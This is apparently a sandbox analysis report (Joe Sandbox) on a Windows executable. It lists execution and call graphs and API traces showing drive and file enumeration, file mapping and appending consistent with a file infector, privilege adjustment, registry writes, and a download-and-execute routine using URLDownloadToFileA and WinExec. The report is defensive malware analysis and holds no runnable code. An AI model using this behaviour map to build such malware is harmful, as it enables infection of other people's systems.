                                    execution_graph 1014 2114e1 1015 211541 1014->1015 1016 2114fd GetModuleHandleA 1014->1016 1019 211573 1015->1019 1020 211549 1015->1020 1017 211512 1016->1017 1018 21151a VirtualQuery 1016->1018 1017->1015 1018->1017 1025 211638 GetTempPathA GetSystemDirectoryA GetModuleFileNameA 1019->1025 1024 211566 1020->1024 1042 211af9 1020->1042 1022 211579 ExitProcess 1026 21167a 1025->1026 1027 21167f 1025->1027 1060 21139f GetVersionExA 1026->1060 1048 211718 GetSystemTimeAsFileTime 1027->1048 1030 2116ca 1032 2116d0 1030->1032 1033 2116d7 1030->1033 1031 211686 1031->1030 1037 2116a0 CreateThread 1031->1037 1081 211581 1032->1081 1035 2116dd lstrcpy 1033->1035 1036 21170f 1033->1036 1035->1022 1036->1022 1053 212c48 memset 1037->1053 1297 211099 1037->1297 1041 211718 3 API calls 1041->1030 1043 211b11 1042->1043 1044 211b09 1042->1044 1045 211b16 CreateThread 1043->1045 1047 211b0f 1043->1047 1046 211638 188 API calls 1044->1046 1045->1047 1316 211638 189 API calls 1045->1316 1046->1047 1047->1024 1049 211735 SHSetValueA 1048->1049 1050 211754 1048->1050 1052 211786 __aulldiv 1049->1052 1051 21175a SHGetValueA 1050->1051 1050->1052 1051->1052 1052->1031 1087 211973 PathFileExistsA 1053->1087 1055 212cb2 1058 2116ba WaitForSingleObject 1055->1058 1059 212cbb VirtualFree 1055->1059 1057 212c8f CreateThread WaitForMultipleObjects 1057->1055 1109 212b8c memset GetLogicalDriveStringsA 1057->1109 1058->1041 1059->1058 1061 2114da 1060->1061 1062 2113cf LookupPrivilegeValueA 1060->1062 1061->1027 1063 2113ef 1062->1063 1064 2113e7 1062->1064 1063->1061 1282 21120e GetModuleHandleA GetProcAddress 1063->1282 1277 21119f GetCurrentProcess OpenProcessToken 1064->1277 1070 211448 GetCurrentProcessId 1070->1061 1071 211457 1070->1071 1071->1061 1072 211319 3 API calls 1071->1072 1073 21147f 1072->1073 1074 211319 3 API calls 1073->1074 1075 21148e 1074->1075 1075->1061 1076 211319 3 API calls 1075->1076 1077 2114b4 1076->1077 1078 211319 3 API calls 1077->1078 1079 2114c3 1078->1079 1080 211319 3 API calls 1079->1080 1080->1061 1296 21185b GetSystemTimeAsFileTime srand rand srand rand 1081->1296 1083 211592 wsprintfA wsprintfA lstrlen CreateFileA 1084 211633 1083->1084 1085 2115fb WriteFile CloseHandle 1083->1085 1084->1036 1085->1084 1086 21161d ShellExecuteA 1085->1086 1086->1084 1088 2119a0 1087->1088 1090 211ac7 1087->1090 1089 2119af CreateFileA 1088->1089 1091 2119c4 Sleep 1089->1091 1092 211a28 GetFileSize 1089->1092 1090->1055 1090->1057 1091->1089 1093 2119d5 1091->1093 1094 211a38 1092->1094 1105 211a80 1092->1105 1108 21185b GetSystemTimeAsFileTime srand rand srand rand 1093->1108 1098 211a3d VirtualAlloc 1094->1098 1094->1105 1095 211a96 1099 211aad 1095->1099 1100 211a9c DeleteFileA 1095->1100 1096 211a8d FindCloseChangeNotification 1096->1095 1102 211a53 1098->1102 1098->1105 1099->1090 1107 211ab8 VirtualFree 1099->1107 1100->1099 1101 2119da wsprintfA CopyFileA 1101->1092 1104 211a0d CreateFileA 1101->1104 1102->1105 1106 211a59 ReadFile 1102->1106 1104->1092 1104->1100 1105->1095 1105->1096 1106->1102 1106->1105 1107->1090 1108->1101 1110 212c09 WaitForMultipleObjects 1109->1110 1111 212bc8 1109->1111 1112 212c2a CreateThread 1110->1112 1113 212c3c 1110->1113 1114 212bfa lstrlen 1111->1114 1115 212bd2 GetDriveTypeA 1111->1115 1116 212be3 CreateThread 1111->1116 1112->1113 1120 212845 1112->1120 1114->1110 1114->1111 1115->1111 1115->1114 1116->1114 1117 212b7d 1116->1117 1130 2129e2 memset wsprintfA 1117->1130 1267 21274a memset memset SHGetSpecialFolderPathA wsprintfA 1120->1267 1122 212878 DeleteFileA 1123 21289a 1122->1123 1124 21288c VirtualFree 1122->1124 1125 2128a4 CloseHandle 1123->1125 1126 2128ab 1123->1126 1124->1123 1125->1126 1127 212692 8 API calls 1128 212853 1127->1128 1128->1122 1128->1127 1129 21239d 186 API calls 1128->1129 1129->1128 1131 212a3a memset lstrlen lstrcpyn strrchr 1130->1131 1132 212abc memset memset FindFirstFileA 1130->1132 1131->1132 1133 212a88 1131->1133 1144 2128b8 memset wsprintfA 1132->1144 1133->1132 1135 212a9a lstrcmpiA 1133->1135 1137 212b74 1135->1137 1138 212aad lstrlen 1135->1138 1138->1132 1138->1135 1139 212b61 FindNextFileA 1140 212b23 1139->1140 1141 212b6d FindClose 1139->1141 1142 212b35 lstrcmpiA 1140->1142 1143 2128b8 174 API calls 1140->1143 1141->1137 1142->1140 1142->1141 1143->1139 1145 212905 1144->1145 1146 212951 memset 1144->1146 1145->1146 1147 212956 strrchr 1145->1147 1148 21291b memset wsprintfA 1145->1148 1146->1139 1147->1146 1150 212967 lstrcmpiA 1147->1150 1149 2129e2 180 API calls 1148->1149 1149->1146 1151 212988 lstrcmpiA 1150->1151 1152 21297a 1150->1152 1151->1146 1155 212994 1151->1155 1162 211e6e 1152->1162 1154 2129ad strstr 1157 2129d3 1154->1157 1158 2129cb 1154->1158 1155->1154 1156 2129a5 lstrcpy 1155->1156 1156->1154 1227 212692 1157->1227 1205 21239d strstr 1158->1205 1163 211e7d 1162->1163 1236 211df6 strrchr 1163->1236 1166 211eb0 SetFileAttributesA CreateFileA 1167 212332 1166->1167 1168 211edf 1166->1168 1170 212346 1167->1170 1171 21233d UnmapViewOfFile 1167->1171 1241 211915 1168->1241 1172 212350 1170->1172 1173 21234b FindCloseChangeNotification 1170->1173 1171->1170 1175 212391 1172->1175 1176 212356 FindCloseChangeNotification 1172->1176 1173->1172 1175->1146 1176->1175 1177 211f2e 1177->1167 1247 211c81 1177->1247 1181 211f92 1182 211c81 2 API calls 1181->1182 1183 211f9f 1182->1183 1183->1167 1184 211af9 169 API calls 1183->1184 1185 212024 1183->1185 1189 211fc0 1184->1189 1185->1167 1186 211af9 169 API calls 1185->1186 1187 21207a 1186->1187 1188 211af9 169 API calls 1187->1188 1193 212090 1188->1193 1189->1167 1189->1185 1190 211af9 169 API calls 1189->1190 1191 211ffe 1190->1191 1192 212013 FlushViewOfFile 1191->1192 1192->1185 1194 2120bb memset memset 1193->1194 1195 2120f5 1194->1195 1196 211c81 2 API calls 1195->1196 1197 2121de 1196->1197 1198 212226 memcpy UnmapViewOfFile FindCloseChangeNotification 1197->1198 1252 211b8a 1198->1252 1200 21226e 1260 21185b GetSystemTimeAsFileTime srand rand srand rand 1200->1260 1202 2122ab SetFilePointer SetEndOfFile SetFilePointer WriteFile WriteFile 1203 211915 3 API calls 1202->1203 1204 21231f FindCloseChangeNotification 1203->1204 1204->1167 1206 212451 CreateFileA GetFileSize 1205->1206 1207 2123d8 1205->1207 1208 212480 1206->1208 1209 212675 CloseHandle 1206->1209 1207->1206 1211 212687 1207->1211 1208->1209 1212 212499 1208->1212 1210 21267c RemoveDirectoryA 1209->1210 1210->1211 1211->1146 1213 211915 3 API calls 1212->1213 1214 2124a4 9 API calls 1213->1214 1262 21189d memset CreateProcessA 1214->1262 1217 21255c Sleep memset wsprintfA 1218 2129e2 163 API calls 1217->1218 1219 212597 memset wsprintfA Sleep 1218->1219 1220 21189d 6 API calls 1219->1220 1221 2125e4 Sleep CreateFileA 1220->1221 1222 211915 3 API calls 1221->1222 1223 212610 CloseHandle 1222->1223 1223->1210 1224 21261e 1223->1224 1224->1210 1225 212641 SetFilePointer WriteFile 1224->1225 1225->1210 1226 212667 SetEndOfFile 1225->1226 1226->1210 1228 2126b2 WaitForSingleObject 1227->1228 1229 2126a2 CreateEventA 1227->1229 1230 2126c1 lstrlen ??2@YAPAXI 1228->1230 1231 212708 1228->1231 1229->1228 1232 212736 SetEvent 1230->1232 1233 2126da lstrcpy 1230->1233 1231->1232 1234 212718 lstrcpy ??3@YAXPAX 1231->1234 1232->1146 1235 2126f1 1233->1235 1234->1235 1235->1232 1237 211e13 lstrcpy strrchr 1236->1237 1238 211e62 1236->1238 1237->1238 1239 211e40 lstrcmpiA 1237->1239 1238->1166 1238->1167 1239->1238 1240 211e52 lstrlen 1239->1240 1240->1238 1240->1239 1242 211924 SetFilePointer CreateFileMappingA MapViewOfFile 1241->1242 1243 211928 1241->1243 1242->1167 1242->1177 1244 21194f 1243->1244 1245 21192e memset GetFileTime 1243->1245 1244->1242 1246 211954 SetFileTime 1244->1246 1245->1242 1246->1242 1248 211c9c 1247->1248 1250 211c94 1247->1250 1249 211cae memset memset 1248->1249 1248->1250 1249->1250 1250->1167 1251 21185b GetSystemTimeAsFileTime srand rand srand rand 1250->1251 1251->1181 1258 211b93 1252->1258 1254 211bca srand 1255 211bd8 rand 1254->1255 1256 211c08 1255->1256 1256->1255 1257 211c29 memset memcpy lstrcat 1256->1257 1257->1200 1258->1258 1261 21185b GetSystemTimeAsFileTime srand rand srand rand 1258->1261 1260->1202 1261->1254 1263 2118e0 CloseHandle WaitForSingleObject 1262->1263 1264 21190c 1262->1264 1265 211907 CloseHandle 1263->1265 1266 2118fb GetExitCodeProcess 1263->1266 1264->1210 1264->1217 1265->1264 1266->1265 1276 21185b GetSystemTimeAsFileTime srand rand srand rand 1267->1276 1269 2127b5 wsprintfA CopyFileA 1270 212840 1269->1270 1271 2127de wsprintfA 1269->1271 1270->1128 1272 211973 17 API calls 1271->1272 1273 21280f 1272->1273 1274 212820 CreateFileA 1273->1274 1275 212813 DeleteFileA 1273->1275 1274->1270 1275->1274 1276->1269 1278 211200 CloseHandle 1277->1278 1279 2111c6 AdjustTokenPrivileges 1277->1279 1278->1063 1280 2111f7 CloseHandle 1279->1280 1281 2111f6 1279->1281 1280->1278 1281->1280 1283 211310 1282->1283 1284 21123f GetCurrentProcessId OpenProcess 1282->1284 1283->1061 1291 211319 1283->1291 1284->1283 1285 211262 1284->1285 1286 2112b0 VirtualAlloc 1285->1286 1287 2112f1 CloseHandle 1285->1287 1289 211296 VirtualFree 1285->1289 1290 2112b8 1285->1290 1286->1285 1286->1290 1287->1283 1288 211302 VirtualFree 1287->1288 1288->1283 1289->1286 1290->1287 1292 21134a 1291->1292 1293 21132a GetModuleHandleA GetProcAddress 1291->1293 1294 211351 memset 1292->1294 1295 211363 1292->1295 1293->1292 1293->1295 1294->1295 1295->1061 1295->1070 1296->1083 1298 2110ba 1297->1298 1299 211196 1297->1299 1298->1299 1315 21185b GetSystemTimeAsFileTime srand rand srand rand 1298->1315 1301 211118 wsprintfA wsprintfA URLDownloadToFileA 1302 211168 lstrlen Sleep 1301->1302 1303 2110dc 1301->1303 1302->1298 1306 211000 CreateFileA 1303->1306 1307 211092 WinExec lstrlen 1306->1307 1308 211025 GetFileSize CreateFileMappingA MapViewOfFile 1306->1308 1307->1298 1307->1299 1309 211057 1308->1309 1310 21107b 1308->1310 1311 211061 1309->1311 1312 211074 UnmapViewOfFile 1309->1312 1313 211087 CloseHandle 1310->1313 1314 21108d CloseHandle 1310->1314 1311->1312 1312->1310 1313->1314 1314->1307 1315->1301 1343 212361 1344 212374 1343->1344 1345 21236b UnmapViewOfFile 1343->1345 1346 212382 1344->1346 1347 212379 CloseHandle 1344->1347 1345->1344 1348 212391 1346->1348 1349 212388 CloseHandle 1346->1349 1347->1346 1349->1348 1350 216014 1351 21605f 1350->1351 1352 216035 GetModuleHandleA 1350->1352 1353 21604d GetProcAddress 1352->1353 1354 216058 1353->1354 1354->1351 1354->1353 1354->1354 1317 216076 1318 21607b 1317->1318 1322 2160c7 1317->1322 1320 2160b0 VirtualAlloc 1318->1320 1318->1322 1329 2161b2 1318->1329 1319 21615f VirtualFree 1319->1322 1320->1322 1321 216198 VirtualFree 1321->1329 1322->1319 1322->1321 1323 2160d5 VirtualAlloc 1322->1323 1323->1322 1324 216389 VirtualProtect 1327 2163b7 1324->1327 1325 2163fc VirtualProtect 1326 216400 1325->1326 1327->1325 1328 2163e7 VirtualProtect 1327->1328 1328->1325 1328->1327 1329->1324 1330 2162fb 1329->1330 1331 216158 VirtualFree 1339 2160c7 1331->1339 1332 216198 VirtualFree 1341 2161b2 1332->1341 1333 2160d5 VirtualAlloc 1333->1339 1334 216389 VirtualProtect 1338 2163b7 1334->1338 1335 2163fc VirtualProtect 1337 216400 1335->1337 1336 21615f VirtualFree 1336->1339 1338->1335 1340 2163e7 VirtualProtect 1338->1340 1339->1332 1339->1333 1339->1336 1340->1335 1340->1338 1341->1334 1342 2162fb 1341->1342

                                    Callgraph

                                    • Executed
                                    • Not Executed
                                    • Opacity -> Relevance
                                    • Disassembly available
                                    callgraph 0 Function_002167A4 1 Function_002165A6 2 Function_002169B0 3 Function_00216834 4 Function_00216734 11 Function_00216D00 4->11 12 Function_00216B02 4->12 13 Function_00216A84 4->13 5 Function_002128B8 20 Function_00212692 5->20 28 Function_0021239D 5->28 36 Function_002129E2 5->36 38 Function_00211E6E 5->38 6 Function_00211638 9 Function_00211581 6->9 24 Function_00211099 6->24 26 Function_00211718 6->26 31 Function_0021139F 6->31 48 Function_00212C48 6->48 51 Function_002117D0 6->51 7 Function_00216001 16 Function_0021600A 7->16 8 Function_00211C81 53 Function_0021185B 9->53 10 Function_00211000 10->51 11->2 35 Function_00216B63 11->35 41 Function_00216CF2 11->41 12->35 18 Function_0021680F 13->18 13->41 14 Function_00211D8A 15 Function_00211B8A 15->53 17 Function_00212B8C 46 Function_00212B7D 17->46 47 Function_00212845 17->47 19 Function_0021120E 21 Function_00216012 22 Function_00211915 23 Function_00216014 24->10 24->53 25 Function_00211319 39 Function_00212CF0 26->39 27 Function_00212D9B 28->22 29 Function_0021189D 28->29 28->36 30 Function_0021119F 31->19 31->25 31->30 32 Function_002114E1 32->6 44 Function_00211AF9 32->44 33 Function_00212361 33->27 34 Function_00212D60 35->0 35->2 35->3 36->5 37 Function_00211C68 38->8 38->14 38->15 38->22 38->27 38->34 38->37 43 Function_00211DF6 38->43 38->44 38->53 40 Function_00211973 40->53 45 Function_00216CF8 41->45 42 Function_00216076 49 Function_002166C8 42->49 44->6 46->36 47->20 47->28 50 Function_0021274A 47->50 48->17 48->40 49->11 49->12 49->13 50->40 50->53 52 Function_00216158 52->49 54 Function_0021235D

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 101 2129e2-212a34 memset wsprintfA 102 212a3a-212a86 memset lstrlen lstrcpyn strrchr 101->102 103 212abc-212b21 memset * 2 FindFirstFileA call 2128b8 memset 101->103 102->103 104 212a88-212a98 102->104 110 212b61-212b6b FindNextFileA 103->110 104->103 106 212a9a-212aa7 lstrcmpiA 104->106 108 212b74-212b7a 106->108 109 212aad-212aba lstrlen 106->109 109->103 109->106 111 212b23-212b2a 110->111 112 212b6d-212b6e FindClose 110->112 113 212b4c-212b5c call 2128b8 111->113 114 212b2c-212b33 111->114 112->108 113->110 114->113 115 212b35-212b4a lstrcmpiA 114->115 115->112 115->113
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.1418727030.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true
                                    • Associated: 00000004.00000002.1418708719.0000000000210000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000004.00000002.1418744854.0000000000213000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000004.00000002.1418776813.0000000000214000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000004.00000002.1418801039.0000000000216000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_210000_WwKLWFk.jbxd
                                    Similarity
                                    • API ID: memset$Find$Filelstrcmpilstrlen$CloseFirstNextlstrcpynstrrchrwsprintf
                                    • String ID: %s*$C:\$Documents and Settings
                                    • API String ID: 2826467728-110786608
                                    • Opcode ID: 23e44c0a9838afca35432c46b56984a5930e3c1641a4fcee9cdec350cced0e92
                                    • Instruction ID: c0272ded3822f6bd79b5c60325299b61713d763f0aa3e6779bfd3df709e32c78
                                    • Opcode Fuzzy Hash: 23e44c0a9838afca35432c46b56984a5930e3c1641a4fcee9cdec350cced0e92
                                    • Instruction Fuzzy Hash: 5B4145B2414349EFD720DF90EC49EDB77ECEBA4315F04482AF945D2111EA35D6AC8BA1

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 216 211718-211733 GetSystemTimeAsFileTime 217 211735-211752 SHSetValueA 216->217 218 211754-211758 216->218 219 2117c6-2117cd 217->219 218->219 220 21175a-211784 SHGetValueA 218->220 220->219 221 211786-2117b3 call 212cf0 * 2 220->221 221->219 226 2117b5 221->226 227 2117b7-2117bd 226->227 228 2117bf 226->228 227->219 227->228 228->219
                                    APIs
                                    • GetSystemTimeAsFileTime.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\WwKLWFk.exe), ref: 00211729
                                    • SHSetValueA.SHLWAPI(80000002,SOFTWARE\GTplus,Time,00000003,?,00000008), ref: 0021174C
                                    • SHGetValueA.SHLWAPI(80000002,SOFTWARE\GTplus,Time,?,?,00000001), ref: 0021177C
                                    • __aulldiv.LIBCMT ref: 00211796
                                    • __aulldiv.LIBCMT ref: 002117A8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.1418727030.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true
                                    • Associated: 00000004.00000002.1418708719.0000000000210000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000004.00000002.1418744854.0000000000213000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000004.00000002.1418776813.0000000000214000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000004.00000002.1418801039.0000000000216000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_210000_WwKLWFk.jbxd
                                    Similarity
                                    • API ID: TimeValue__aulldiv$FileSystem
                                    • String ID: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe$SOFTWARE\GTplus$Time
                                    • API String ID: 541852442-923351284
                                    • Opcode ID: 68e985296cbf082a7688d0ba414946ae0a134d9328356fb22df64556d3cb0c5a
                                    • Instruction ID: e5c133176bc79520fa7c63d2917a043d12cb188a7199783638619f5ef2763fdc
                                    • Opcode Fuzzy Hash: 68e985296cbf082a7688d0ba414946ae0a134d9328356fb22df64556d3cb0c5a
                                    • Instruction Fuzzy Hash: BA116D71910209BBDB10DA94CC85FEFBBFDEB55714F108115FA04B6280D7719AA58B60

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 229 216076-216079 230 2160e0-2160eb 229->230 231 21607b-216080 229->231 234 2160ee-2160f4 230->234 232 216082-216085 231->232 233 2160f7-2160f8 231->233 235 2160f6 232->235 238 216087 232->238 236 2160fa-2160fc call 2166c8 233->236 237 2160fe-216106 233->237 234->235 235->233 236->237 240 216155-216189 VirtualFree 237->240 241 216108-21611d 237->241 238->234 242 216089-216095 238->242 247 21618c-216192 240->247 244 21611f-216121 241->244 245 2160a1-2160aa 242->245 246 216097-21609f 242->246 248 216151-216154 244->248 249 216123 244->249 250 2160b0-2160c1 VirtualAlloc 245->250 251 2161ba-2161c8 245->251 246->245 252 2160c7-2160cf 247->252 253 216198-2161b0 VirtualFree 247->253 248->240 249->248 256 216125-216128 249->256 250->252 254 216243-216251 251->254 255 2161ca-2161d7 251->255 252->247 263 2160d5-2160df VirtualAlloc 252->263 253->251 259 2161b2-2161b4 253->259 257 216253 254->257 258 216264-21626f 254->258 260 2161dd-2161e0 255->260 261 216134-21613b 256->261 262 21612a-21612e 256->262 264 216255-216258 257->264 265 216271-216276 258->265 259->251 260->254 266 2161e2-2161f2 260->266 273 216130-216132 261->273 274 21613d-21614f 261->274 262->261 262->273 263->230 264->258 269 21625a-216262 264->269 270 216389-2163b1 VirtualProtect 265->270 271 21627c-216289 265->271 272 2161f5-2161fe 266->272 269->264 277 2163b7-2163ba 270->277 287 216292-216298 271->287 288 21628b 271->288 275 216200-216203 272->275 276 21620c-216219 272->276 273->244 274->244 279 216205-216208 275->279 280 21621b-216228 275->280 281 216238-21623f 276->281 282 2163fc-2163ff VirtualProtect 277->282 283 2163bc-2163c2 277->283 289 21622a-216236 279->289 290 21620a 279->290 280->281 281->272 285 216241 281->285 286 216400-216416 282->286 283->283 284 2163c4 283->284 284->282 291 2163c6-2163cf 284->291 285->260 292 216420-216425 286->292 293 216418-21641d 286->293 294 2162a2-2162ac 287->294 288->287 289->281 290->281 295 2163d1 291->295 296 2163d4-2163d8 291->296 297 2162b1-2162c8 294->297 298 2162ae 294->298 295->296 301 2163da 296->301 302 2163dd-2163e1 296->302 299 216373-216384 297->299 300 2162ce-2162d4 297->300 298->297 299->265 303 2162d6-2162d9 300->303 304 2162da-2162f1 300->304 301->302 305 2163e3 302->305 306 2163e7-2163fa VirtualProtect 302->306 303->304 308 2162f3-2162f9 304->308 309 216365-21636e 304->309 305->306 306->277 306->282 310 216314-216326 308->310 311 2162fb-21630f 308->311 309->294 313 216328-21634a 310->313 314 21634c-216360 310->314 312 216426-2164a9 311->312 323 216519-21651c 312->323 324 2164ab-2164c0 312->324 313->309 314->312 325 216583-216587 323->325 326 21651d-21651e 323->326 330 2164c2 324->330 331 216535-216537 324->331 328 216588-21658b 325->328 329 216522-216533 326->329 332 2165a1-2165a3 328->332 333 21658d-21658f 328->333 329->331 336 2164c5-2164cd 330->336 337 2164f8 330->337 334 216539 331->334 335 21659a 331->335 340 216591-216593 333->340 341 2165b4 334->341 342 21653b-216541 334->342 343 21659b-21659d 335->343 344 216542-216545 336->344 345 2164cf-2164d4 336->345 338 2164fa-2164fe 337->338 339 21656c-21656f 337->339 351 216500 338->351 352 216572 338->352 339->352 340->343 353 216595 340->353 350 2165be-216608 341->350 342->344 343->340 346 21659f 343->346 347 21654d-216550 344->347 348 216517-216518 345->348 349 2164d6-2164d9 345->349 346->328 347->350 354 216552-216556 347->354 348->323 349->347 355 2164db-2164f5 349->355 351->329 356 216502 351->356 357 216573-216576 352->357 353->335 359 216578-21657f 354->359 360 216558-216569 354->360 355->337 356->357 361 216504-216513 356->361 357->359 359->325 360->339 361->331 363 216515 361->363 363->348
                                    APIs
                                    • VirtualAlloc.KERNEL32(00000000,00001800,00001000,00000004), ref: 002160BE
                                    • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,?,?), ref: 002160DF
                                    • VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?), ref: 00216189
                                    • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 002161A5
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.1418801039.0000000000216000.00000040.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true
                                    • Associated: 00000004.00000002.1418708719.0000000000210000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000004.00000002.1418727030.0000000000211000.00000020.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000004.00000002.1418744854.0000000000213000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000004.00000002.1418776813.0000000000214000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_210000_WwKLWFk.jbxd
                                    Similarity
                                    • API ID: Virtual$AllocFree
                                    • String ID:
                                    • API String ID: 2087232378-0
                                    • Opcode ID: 2ecd1242d3afdaddd6241aead892a0e94624852eba51f66b99f9dbf36506a709
                                    • Instruction ID: 94e99cb00dc994222a715c2b9411b900feccfc262fd5028bf68729030242dd57
                                    • Opcode Fuzzy Hash: 2ecd1242d3afdaddd6241aead892a0e94624852eba51f66b99f9dbf36506a709
                                    • Instruction Fuzzy Hash: A11258725287869FDB328F24CC497EE3BF5EF22310F18459DDC898B292D274A9A0C751

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 365 212b8c-212bc6 memset GetLogicalDriveStringsA 366 212c09-212c28 WaitForMultipleObjects 365->366 367 212bc8-212bcc 365->367 368 212c2a-212c3a CreateThread 366->368 369 212c3c-212c45 366->369 370 212bfa-212c07 lstrlen 367->370 371 212bce-212bd0 367->371 368->369 370->366 370->367 371->370 372 212bd2-212bdc GetDriveTypeA 371->372 372->370 373 212bde-212be1 372->373 373->370 374 212be3-212bf6 CreateThread 373->374 374->370
                                    APIs
                                    • memset.MSVCRT ref: 00212BA6
                                    • GetLogicalDriveStringsA.KERNEL32(00000050,?), ref: 00212BB4
                                    • GetDriveTypeA.KERNEL32(?), ref: 00212BD3
                                    • CreateThread.KERNEL32(00000000,00000000,Function_00002B7D,?,00000000,00000000), ref: 00212BEE
                                    • lstrlen.KERNEL32(?), ref: 00212BFB
                                    • WaitForMultipleObjects.KERNEL32(?,?,00000001,000000FF), ref: 00212C16
                                    • CreateThread.KERNEL32(00000000,00000000,00212845,00000000,00000000,00000000), ref: 00212C3A
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.1418727030.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true
                                    • Associated: 00000004.00000002.1418708719.0000000000210000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000004.00000002.1418744854.0000000000213000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000004.00000002.1418776813.0000000000214000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000004.00000002.1418801039.0000000000216000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_210000_WwKLWFk.jbxd
                                    Similarity
                                    • API ID: CreateDriveThread$LogicalMultipleObjectsStringsTypeWaitlstrlenmemset
                                    • String ID:
                                    • API String ID: 1073171358-0
                                    • Opcode ID: fea29eeb05b7de5af4ab6cb7c45a052460c2b8e0a1a7a66c56f9072f8ac66543
                                    • Instruction ID: 5d63d200089bbaff38e57529fb294811c1ffcdbe32bc72ebbeade49b201e5824
                                    • Opcode Fuzzy Hash: fea29eeb05b7de5af4ab6cb7c45a052460c2b8e0a1a7a66c56f9072f8ac66543
                                    • Instruction Fuzzy Hash: BA21D8B180014DEFD720EF64AC88EEE7BEDFB29358B150115F94192151D7208E6ACB60

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 0 211e6e-211e95 call 212d60 3 211e97 call 211d8a 0->3 4 211e9c-211eaa call 211df6 0->4 3->4 8 211eb0-211ed9 SetFileAttributesA CreateFileA 4->8 9 212332 4->9 8->9 10 211edf-211f28 call 211915 SetFilePointer CreateFileMappingA MapViewOfFile 8->10 11 212338-21233b 9->11 10->9 20 211f2e-211f39 10->20 13 212346-212349 11->13 14 21233d-212340 UnmapViewOfFile 11->14 15 212350-212354 13->15 16 21234b-21234e FindCloseChangeNotification 13->16 14->13 18 212391-21239a call 212d9b 15->18 19 212356-21235b FindCloseChangeNotification 15->19 16->15 19->18 20->9 22 211f3f-211f56 20->22 22->9 24 211f5c-211f64 22->24 24->9 25 211f6a-211f70 24->25 25->9 26 211f76-211f87 call 211c81 25->26 26->9 29 211f8d-211fa7 call 21185b call 211c81 26->29 29->9 34 211fad-211fb4 29->34 35 212024-212045 34->35 36 211fb6-211fc5 call 211af9 34->36 35->9 37 21204b-21204e 35->37 36->35 44 211fc7-211fd2 36->44 39 212070-2120f4 call 211af9 * 2 call 211c68 * 2 memset * 2 37->39 40 212050-212053 37->40 62 2120f5-2120fe 39->62 42 212056-21205a 40->42 42->39 45 21205c-212061 42->45 44->9 47 211fd8-211fe7 44->47 45->9 48 212067-21206e 45->48 50 211fe9-211fec 47->50 51 211fef-212006 call 211af9 47->51 48->42 50->51 57 212013-21201e FlushViewOfFile 51->57 58 212008-21200e call 211c68 51->58 57->35 58->57 63 212130-212139 62->63 64 212100-212114 62->64 67 21213c-212142 63->67 65 212116-21212a 64->65 66 21212d-21212e 64->66 65->66 66->62 68 212144-212150 67->68 69 21215c 67->69 70 212152-212154 68->70 71 212157-21215a 68->71 72 21215f-212162 69->72 70->71 71->67 73 212181-212184 72->73 74 212164-212171 72->74 77 212186 73->77 78 21218d-2121ba call 211c68 73->78 75 212177-21217e 74->75 76 21232a-21232d 74->76 75->73 76->72 77->78 81 2121d3-21220b call 211c81 call 211c68 78->81 82 2121bc-2121d0 call 211c68 78->82 89 21221b-21221e 81->89 90 21220d-212218 call 211c68 81->90 82->81 92 212220-212223 89->92 93 212226-212328 memcpy UnmapViewOfFile FindCloseChangeNotification call 211b8a call 21185b SetFilePointer SetEndOfFile SetFilePointer WriteFile * 2 call 211915 FindCloseChangeNotification 89->93 90->89 92->93 93->11
                                    APIs
                                    • SetFileAttributesA.KERNEL32(?,00000080,?,002132B0,00000164,00212986,?), ref: 00211EB9
                                    • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000003,00000080,00000000), ref: 00211ECD
                                    • SetFilePointer.KERNEL32(000000FF,00000000,00000000,00000002,00000000,00000000), ref: 00211EF3
                                    • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00000000,00000000), ref: 00211F07
                                    • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000400), ref: 00211F1D
                                    • FlushViewOfFile.KERNEL32(?,00000400,?,00000000,00000000,?,00000000,00000002), ref: 0021201E
                                    • memset.MSVCRT ref: 002120D8
                                    • memset.MSVCRT ref: 002120EA
                                    • memcpy.MSVCRT ref: 0021222D
                                    • UnmapViewOfFile.KERNEL32(?,?,00000002,?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00212238
